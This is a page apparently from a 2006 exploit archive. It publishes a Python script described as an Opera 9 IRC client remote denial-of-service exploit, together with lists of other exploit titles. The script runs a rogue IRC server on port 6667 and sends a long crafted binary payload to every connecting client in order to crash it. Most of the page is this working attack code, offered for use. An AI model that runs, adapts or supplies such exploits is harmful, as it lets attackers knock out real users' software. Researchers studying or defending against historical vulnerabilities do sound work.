exploits , vulnerabilities , articles , Opera 9 IRC Client Remote Denial of Service Exploit (py)

2006-08-13 Opera 9 IRC Client Remote Denial of Service Exploit (c)
2006-07-01 Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit
2006-06-21 Opera 9 (long href) Remote Denial of Service Exploit
2006-05-25 Opera >8.x DOS
2005-11-30 QNX Realtime Operating System (RTOS) "phgrafx" Local Buffer Overflow Exploit

2006-08-13

Opera 9 IRC Client Remote Denial of Service Exploit (py)

Rated as : High Risk

#!/usr/bin/python

#
# Opera 9 IRC client DOS
# NNP + Preddy
# http://silenthack.co.uk
# http://smashthestack.org
# http://www.team-rootshell.com
#

import socket

die = '''\x3a\x61\x61\x61\x20\x33\x35\x33
\x20\x15\xf8\x9c\x71\x0a\x3a\x64
\xff\x26\xf8\x9b\x33\xd2\x9b\x34
\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8
\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6
\xb3\xde\x42\x25\xe8\x7c\x89\xe7
\xa2\x81\x83\xd6\x53\x1e\x0a\xf7
\xc5\x87\x59\x97\x2f\x88\x4f\xc9
\x0d\xb2\x07\x2b\x50\xed\xd1\x03
\xcb\x13\x28\xb3\x90\xb1\x9b\x32
\x32\x1e\x08\x85\x3c\x13\x7c\x02
\x9a\xd6\x99\xca\x5e\xe8\x93\x6c
\x9a\x9b\x97\xea\x88\x69\xed\x54
\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa
\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5
\xd2\x98\xbf\x30\x80\x52\x9c\x1a
\xed\x34\x04\x76\x9d\xf1\xca\x19
\x07\xd1\x26\xcf\x74\x65\xc9\x34
\xac\x48\x31\x07\x44\x30\xfc\x16
\xc8\xbb\x47\x48\x0d\xe3\x62\xfb
\x17\x66\x71\xb4\x58\x3b\xce\x5f
\x0c\xf4\x2e\x80\x59\xf7\xb5\x05
\x40\xe6\x0c\x84\x17\x08\x9b\xdf
\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd
\xf1\x3d\x91\x49\x78\x5f\xa8\x84
\x53\xd7\x05\xac\xce\xba\xb2\x0e
\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a
\x10\xbf\x5b\xd5\x49\x27\xb2\x3a
\x64\x44\x83\xdc\xa3\x2c\x61\xf7
\x03\x66\xa3\xd1\x20\x55\xe0\xc0
\x14\x73\x78\xdb\xa1\x0f\x65\xb1
\xce\xc1\x86\x17\xe8\x39\x52\x4d
\x7d\xd5\x29\x20\x01\x8a\x17\x04
\xf0\xbb\xd6\x10\x10\xb6\xd1\x24
\x29\x49\xff\xca\x58\x65\x7b\x26
\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7
\x65\x85\xd8\x66\x0f\xef\x6b\x00
\xaa\x41\x10\xbb\xf7\xe1\xdf\x20
\x2a\xdf\xea\x82\x44\x65\xa8\x6a
\x66\xe6\x78\xa1\x75\xd4\x58\xda
\x59\x30\x41\x68\x20\xac\x68\xca
\xed\x79\x85\xe4\x5a\x65\x04\x85
\x44\xee\x07\x88\x53\xb0\xf2\xb9
\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97
\xe3\x27\x00\x03\xd3\x68\xce\xc0
\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc
\x96\xc8\x84\xe9\x78\x76\xa2\x0e
\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93
\x27\xb7\x97\xfa\x1f\x65\xba\x01
\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c
\xc6\xf2\x85\x3f\x68\x27\x4d\x49
\x24\x67\x69\xd4\x67\x20\x68\x8e
\xd7\xff\x88\xf6\x64\x42\xf7\x1c
\xa0\x34\x8d\xa6\x32\xfb\x42\xf9
\xed\xc7\x38\x55\xef\x85\x9f\x13
\xed\x08\xe8\x54\x28\x50\xe3\xff
\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e
\x21\x5d\xf5\x54\x58\x37\x4d\x45
\xff\x85\x9a\xee\x0a\x39\x01\xf7
\x41\xe9\x4c\x69\x39\x2f\x68\x88
\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c
\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2
\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a
\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa
\x4a\x99\xf2\x95\xa4\x89\x02\x0c
\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62
\x70\x4c\xff\x49\xfe\x94\x64\x99
\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f
\x65\x20\xb4\x09\xaa\xb6\x15\xbf
\x79\xe1\x98\x49\xb2\x34\xab\x22
\x80\xab\x6c\x7e\x3f\xd0\x17\xb3
\xb8\x86\x37\x8c\x52\x65\xab\xb7
\x86\x60\xc0\x30\x16\xd5\xef\x8f
\xb6\x88\xd8\x68\xbc\x84\x8a\x3c
\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e
\x57\x59\x0b\xa9\xbe\xb6\x60\x44
\x16\x20\x74\x2d\xf5\x64\xbc\xab
\xec\x95\x13\xa8\x19\x9e\xe4\x48
\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7
\x30\xe4\x70\xef\x9b\xd1\x33\xb1
\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8
\x30\xa6\xa0\x49\x44\x84\x91\xd8
\x22\x47\x33\x91\x1e\x0d\x58\x4f
\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b
\x19\x1c\x72\x25\xb7\x05\x1d\xe7
\xab\xbd\x30\xef\x41\xc1\xc7\x63
\x08\xfb\xf5\x27\x08\x4d\x76\xf9
\x16\xb4\x86\xb0\x25\xc4\x3c\x3f
\xe0\xae\x64\x98\xb3\x82\x7f\x5e
\x3f\xb0\x4d\x81\x71\x15\xe4\x7a
\x10\xd9\xa1\x18\x27\x17\x11\x3d
\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c
\xd8\x94\xd4\x8c\x16\x53\xea\x55
\x03\x38\xd6\x75\x4d\xbb\xef\x5d
\x94\x90\x75\xbb\xa7\x86\xf9\x72
\x1e\xe7\x62\x79\x11\x92\xb5\xe9
\x26\x89\x75\x3c\xdd\x60\x91\xe0
\x98\x68\x55\xe5\x23\x44\x42\xb7
\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b
\x53\x50\xd5\x64\xe2\x8a\x4d\x08
\x14\xc3\x44\xf1\x23\xd5\xd1\xbb
\x3d\x27\xa0\x60\x6b\xe2\x18\x40
\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a
\xf9\x07\xae\xdb\x91\xfb\xe3\xa5
\xbe\x27\x96\xe1\xfc\x68\x9c\x3a
\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7
\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98
\xc7\x2c\x73\x58\x28\x56\xfe\xe6
\x7d\x94\xc8\x79\xfc\x64\xb3\x8b
\xa1\x4e\x86\xbf\x00\xc0\x77\x3e
\xb6\x05\x72\x55\xc5\xf1\xed\x8c
\x1d\x60\xe4\x45\xb6\xe2\x2c\x33
\x77\xf4\xad\x73\x58\x60\xff\xf9
\xae\x85\xb9\xaf\x45\x30\xed\xfc
\x35\x5f\x51\xfa\x50\x3f\x86\x6e
\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4
\xd3\x36\x37\x2c\x97\x36\x25\x45
\xbb\xde\xf4\x01\x0e\xe1\xfd\x43
\x41\x4e\x3d\x91\x8d\xc3\xff\x2d
\x2e\xb3\x83\x7b\x92\x0c\x3f\x66
\x43\x76\x92\xda\xad\xb7\x1f\x68
\x96\x14\x69\xa4\xf5\x66\xe8\x36
\xb5\x25\xc8\x42\xe9\xc7\x6f\x17
\x7a\xf2\x92\x0d\xff\xd1\x73\x42
\x47\x05\x1c\xf4\xbc\x3b\x5d\x52
\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2
\x04\x43\x24\xed\x0b\x94\x04\x85
\x86\x96\x92\x85\x67\x05\xc7\xaf
'''

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 6667))
s.listen(5)

while 1:
    (clientsock, address) = s.accept()
    sent = clientsock.send(die)
    print "Sent %d bytes" % sent
    sent = 0


securitydot.net - 2006-08-13

Exploits - newest 10 RSS | More

2007-06-15 56886 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33960 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42094 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29178 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19604 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16578 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19246 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16440 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33421 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17102 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit